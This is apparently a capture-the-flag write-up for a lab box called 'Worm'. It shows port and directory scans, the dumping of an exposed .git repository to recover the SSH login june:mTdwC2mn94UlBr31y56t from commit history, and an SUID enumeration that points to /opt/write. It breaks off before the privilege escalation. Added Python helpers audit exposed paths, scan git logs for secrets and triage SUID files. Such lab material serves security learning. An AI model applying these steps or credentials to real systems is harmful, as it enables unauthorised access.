Worm

192.168.100.47

Information gathering

Port scan

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  rustscan -a 192.168.100.47                                                                                   [16:28:54]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.47:22
Open 192.168.100.47:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 16:28 CST
Initiating ARP Ping Scan at 16:28
Scanning 192.168.100.47 [1 port]
Completed ARP Ping Scan at 16:28, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:28
Completed Parallel DNS resolution of 1 host. at 16:29, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 16:29
Scanning 192.168.100.47 [2 ports]
Discovered open port 22/tcp on 192.168.100.47
Discovered open port 80/tcp on 192.168.100.47
Completed SYN Stealth Scan at 16:29, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.47
Host is up, received arp-response (0.00043s latency).
Scanned at 2026-01-21 16:29:06 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:6E:53:BB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory scan on 80/tcp

root@LAPTOP-O235O5EH [/opt/tools] ➜  dirsearch -u http://192.168.100.47                                                    [16:57:39]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /opt/tools/reports/http_192.168.100.47/_26-01-21_16-57-50.txt

Target: http://192.168.100.47/

[16:57:50] Starting:
[16:57:51] 301 - 315B - /.git -> http://192.168.100.47/.git/
[16:57:51] 200 - 607B - /.git/
[16:57:51] 200 - 2B - /.git/COMMIT_EDITMSG
[16:57:51] 200 - 412B - /.git/branches/
[16:57:51] 200 - 73B - /.git/description
[16:57:51] 200 - 92B - /.git/config
[16:57:51] 200 - 23B - /.git/HEAD
[16:57:51] 200 - 674B - /.git/hooks/
[16:57:51] 200 - 217B - /.git/index
[16:57:51] 200 - 240B - /.git/info/exclude
[16:57:51] 200 - 460B - /.git/info/
[16:57:51] 301 - 325B - /.git/logs/refs -> http://192.168.100.47/.git/logs/refs/
[16:57:51] 200 - 484B - /.git/logs/
[16:57:51] 200 - 558B - /.git/logs/HEAD
[16:57:51] 301 - 331B - /.git/logs/refs/heads -> http://192.168.100.47/.git/logs/refs/heads/
[16:57:51] 200 - 558B - /.git/logs/refs/heads/master
[16:57:51] 200 - 533B - /.git/objects/
[16:57:51] 200 - 464B - /.git/refs/
[16:57:51] 301 - 326B - /.git/refs/heads -> http://192.168.100.47/.git/refs/heads/
[16:57:51] 200 - 41B - /.git/refs/heads/master
[16:57:51] 301 - 325B - /.git/refs/tags -> http://192.168.100.47/.git/refs/tags/
[16:57:51] 403 - 279B - /.ht_wsr.txt
[16:57:51] 403 - 279B - /.htaccess.bak1
[16:57:51] 403 - 279B - /.htaccess.orig
[16:57:51] 403 - 279B - /.htaccess.sample
[16:57:51] 403 - 279B - /.htaccess.save
[16:57:51] 403 - 279B - /.htaccess_orig
[16:57:51] 403 - 279B - /.htaccess_extra
[16:57:51] 403 - 279B - /.htaccessBAK
[16:57:51] 403 - 279B - /.htaccess_sc
[16:57:51] 403 - 279B - /.htaccessOLD2
[16:57:51] 403 - 279B - /.htaccessOLD
[16:57:51] 403 - 279B - /.htm
[16:57:51] 403 - 279B - /.html
[16:57:51] 403 - 279B - /.htpasswd_test
[16:57:51] 403 - 279B - /.htpasswds
[16:57:51] 403 - 279B - /.httr-oauth
[16:57:51] 403 - 279B - /.php
[16:58:02] 403 - 279B - /server-status
[16:58:02] 403 - 279B - /server-status/

Task Completed

The .git directory is exposed (git source leak).
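
An added check, not part of the original writeup, that reads dirsearch-style report lines and separates sensitive paths the server actually served from those its own access rules blocked; the sample is a constructed subset of the output above, and the line-format regex is an assumption about dirsearch's output.

```python
import re
from collections import defaultdict
# dirsearch hit line as printed in this writeup (format assumed from the output above):
#   [HH:MM:SS] STATUS - SIZE - /path [-> redirect target]
LINE_RE = re.compile(r"^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+\d+(?:B|KB|MB)\s+-\s+(\S+)")

# Paths whose mere readability leaks source, history or server internals.
SENSITIVE = {
    "vcs-metadata": re.compile(r"^/\.(git|svn|hg)(/|$)"),
    "apache-dotfiles": re.compile(r"^/\.ht(access|passwd)"),
    "server-status": re.compile(r"^/server-status(/|$)"),
}

def classify(path):
    """Name the sensitive category a path falls into, or None."""
    for category, pattern in SENSITIVE.items():
        if pattern.match(path):
            return category
    return None

def audit(report_lines):
    """Split sensitive hits into 'exposed' (2xx/3xx: served or redirected
    to) and 'blocked' (401/403: stopped by the server's own access rules).
    The contrast is the finding: Apache denies .ht* by default, but nothing
    in a stock config covers .git, so the whole repository is readable."""
    result = defaultdict(lambda: {"exposed": [], "blocked": []})
    for line in report_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # banner, blank or summary line
        status, path = int(m.group(1)), m.group(2)
        category = classify(path)
        if category is None:
            continue
        if status < 400:
            result[category]["exposed"].append(path)
        elif status in (401, 403):
            result[category]["blocked"].append(path)
    return dict(result)

# Constructed subset of the dirsearch output above, plus one benign hit.
SAMPLE_REPORT = [
    "[16:57:51] 301 - 315B - /.git -> http://192.168.100.47/.git/",
    "[16:57:51] 200 - 23B - /.git/HEAD",
    "[16:57:51] 200 - 92B - /.git/config",
    "[16:57:51] 403 - 279B - /.htpasswds",
    "[16:58:02] 403 - 279B - /server-status",
    "[16:57:51] 200 - 1KB - /index.html",
]
```

The fix on the server side is a deny rule for the VCS directory itself (or not deploying it at all), the same kind of rule that already produced the 403s for the .ht* files.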

gitdump

python3 git-dump.py http://192.168.100.47/

Inspect the commit log

git log -p


Credentials obtained

june:mTdwC2mn94UlBr31y56t
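
An added example, not from the writeup, of what the `git log -p` step above finds when it is automated: it scans a constructed log excerpt (placeholder commit hash, file name `config.php` assumed) for credential-shaped strings on both added and removed lines.

```python
import re

# Constructed `git log -p` excerpt; the commit hash is a placeholder and the
# credential is the one recovered from this box's history.
SAMPLE_LOG = """\
commit 0000000000000000000000000000000000000001
Author: dev <dev@example.invalid>
Date:   Mon Jan 1 00:00:00 2024 +0000

    stop hardcoding the login

diff --git a/config.php b/config.php
--- a/config.php
+++ b/config.php
@@ -1,3 +1,3 @@
 <?php
-$login = "june:mTdwC2mn94UlBr31y56t";
+$login = getenv("APP_LOGIN");
"""

# Deliberately narrow patterns: a user:password pair and a quoted secret
# assignment. Broaden them for a real repository sweep.
SECRET_PATTERNS = [
    ("user:password pair", re.compile(r"\b[a-z][a-z0-9_]{2,}:[A-Za-z0-9]{16,}\b")),
    ("secret assignment",
     re.compile(r"(?i)(passw(or)?d|secret|token)\s*[=:]\s*['\"][^'\"]{8,}['\"]")),
]

def scan_git_log(text):
    """Report secret-looking strings on every changed line of every commit.
    Removed (-) lines count as much as added ones: deleting a secret from
    HEAD leaves it in history, which is exactly how it was found here."""
    findings, commit, path = [], None, None
    for line in text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[6:]
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            for kind, pattern in SECRET_PATTERNS:
                m = pattern.search(line[1:])
                if m:
                    findings.append({
                        "commit": commit, "file": path, "kind": kind,
                        "change": "removed" if line[0] == "-" else "added",
                        "match": m.group(0),
                    })
    return findings
```

A commit that removes a credential is a signal to rotate it, not proof that it is gone.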

Privilege escalation

june -> root

ssh june@192.168.100.47

Use find to locate SUID files

june@Worm:~$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/write
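
An added example, not from the writeup, that triages the `find` output above against a known-good SUID baseline and flags binaries outside package-managed trees; the baseline and the find output are constructed from the listing above and are assumptions, not a verified distro manifest.

```python
import os
import stat

# Baseline SUID set for the box's distribution: the find output above minus
# the one binary that is not part of any stock package. On a real host take
# the baseline from a clean image or the package manifests, never from the
# host under review.
BASELINE = {
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/su", "/usr/bin/umount", "/usr/bin/pkexec",
    "/usr/bin/sudo", "/usr/bin/passwd",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/libexec/polkit-agent-helper-1",
}

# Directory trees owned by the package manager; SUID files elsewhere are
# the first thing to inspect.
PACKAGED_TREES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/")

# Constructed to match the `find / -perm -4000 -type f` output above.
FIND_OUTPUT = "\n".join(sorted(BASELINE) + ["/opt/write"])

def triage_suid(find_output, baseline=BASELINE):
    found = {ln.strip() for ln in find_output.splitlines() if ln.strip()}
    unexpected = sorted(found - baseline)
    return {
        "unexpected": unexpected,
        "custom_locations": [p for p in unexpected if not p.startswith(PACKAGED_TREES)],
        "missing": sorted(baseline - found),   # tampering can remove SUID bits too
    }

def live_suid_scan(root="/"):
    """Same result as the find command, without shelling out; symlinks are
    not followed and unreadable directories are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p)
    return "\n".join(sorted(hits))
```

Running `triage_suid(live_suid_scan())` as root gives the same verdict the manual listing leads to here: /opt/write is the only binary that needs explaining.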

Approach 1

The write binary under /opt looks promising; download it for analysis.


Fed to an AI for analysis.


The key point is to make the file write fail.